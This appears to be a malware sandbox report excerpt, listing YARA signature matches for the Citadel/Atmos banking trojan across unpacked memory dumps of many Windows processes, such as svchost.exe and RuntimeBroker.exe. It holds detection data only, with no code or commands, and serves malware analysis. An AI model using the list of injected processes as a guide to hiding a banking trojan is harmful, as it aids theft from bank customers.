                        Source: 41.0.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 39.0.XRdxSzSUL8yOL.exe.2b30000.1.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 39.0.XRdxSzSUL8yOL.exe.2b30000.1.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 33.0.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 33.0.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 22.3.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 22.3.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 22.3.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 15.3.smartscreen.exe.290000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 15.3.smartscreen.exe.290000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 15.3.smartscreen.exe.290000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 33.0.XRdxSzSUL8yOL.exe.2e50000.1.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 33.0.XRdxSzSUL8yOL.exe.2e50000.1.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 19.3.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 19.3.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 19.3.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 18.0.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 18.0.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 18.0.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 20.0.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 20.0.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 20.0.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 25.0.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 25.0.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 25.0.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 32.0.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 32.0.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 14.3.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 14.3.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 14.3.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 34.0.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 34.0.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 24.0.svchost.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 24.0.svchost.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 24.0.svchost.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 27.3.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 27.3.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 27.3.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 26.0.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 26.0.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 26.0.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 2.3.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 2.3.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 2.3.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 28.3.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 28.3.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 28.3.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 9.0.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 9.0.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 9.0.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 3.0.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 3.0.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 3.0.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 3.0.svchost.exe.910000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 3.0.svchost.exe.910000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 3.0.svchost.exe.910000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 24.3.svchost.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 24.3.svchost.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 24.3.svchost.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 40.0.XRdxSzSUL8yOL.exe.2390000.1.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 40.0.XRdxSzSUL8yOL.exe.2390000.1.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 2.3.sihost.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 2.3.sihost.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 2.3.sihost.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 6.3.explorer.exe.c350000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 6.3.explorer.exe.c350000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 30.2.XRdxSzSUL8yOL.exe.2990000.1.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 30.2.XRdxSzSUL8yOL.exe.2990000.1.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 15.0.smartscreen.exe.290000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 15.0.smartscreen.exe.290000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 15.0.smartscreen.exe.290000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 33.2.XRdxSzSUL8yOL.exe.2e50000.1.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 33.2.XRdxSzSUL8yOL.exe.2e50000.1.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 14.0.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 14.0.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 14.0.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 0.0.services.png.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 38.0.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 38.0.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 35.2.XRdxSzSUL8yOL.exe.25d0000.1.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 35.2.XRdxSzSUL8yOL.exe.25d0000.1.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 36.2.XRdxSzSUL8yOL.exe.2ca0000.1.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 36.2.XRdxSzSUL8yOL.exe.2ca0000.1.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 2.0.sihost.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 2.0.sihost.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 2.0.sihost.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 30.0.XRdxSzSUL8yOL.exe.2990000.1.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 30.0.XRdxSzSUL8yOL.exe.2990000.1.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 10.0.SearchApp.exe.a90000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 10.0.SearchApp.exe.a90000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 10.0.SearchApp.exe.a90000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 30.2.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 30.2.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 27.0.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 27.0.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 27.0.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 29.0.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 29.0.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 29.0.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 32.2.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 32.2.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 31.0.XRdxSzSUL8yOL.exe.2e30000.1.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 31.0.XRdxSzSUL8yOL.exe.2e30000.1.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 34.2.XRdxSzSUL8yOL.exe.2400000.1.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 34.2.XRdxSzSUL8yOL.exe.2400000.1.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 4.0.svchost.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 4.0.svchost.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 4.0.svchost.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 5.0.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 5.0.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 5.0.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 1.0.nyheukpo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 1.3.nyheukpo.exe.20f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 5.3.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 5.3.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 5.3.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 40.0.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 40.0.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 14.3.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 14.3.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 14.3.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 15.0.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 15.0.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 15.0.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 7.0.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 41.2.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 41.2.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 2.0.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 2.0.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 2.0.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 7.0.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 7.0.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 32.2.XRdxSzSUL8yOL.exe.2530000.1.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 32.2.XRdxSzSUL8yOL.exe.2530000.1.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 29.3.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 29.3.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 29.3.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 7.3.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 7.3.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 7.3.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 38.0.XRdxSzSUL8yOL.exe.2f50000.1.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 38.0.XRdxSzSUL8yOL.exe.2f50000.1.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 36.0.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 36.0.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 34.2.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 34.2.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 18.0.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 18.0.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 18.0.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 9.3.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 9.3.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 9.3.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 17.0.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 17.0.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 17.0.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 9.3.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 9.3.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 9.3.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 34.0.XRdxSzSUL8yOL.exe.2400000.1.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 34.0.XRdxSzSUL8yOL.exe.2400000.1.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 5.3.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 5.3.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 5.3.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 15.3.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 15.3.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
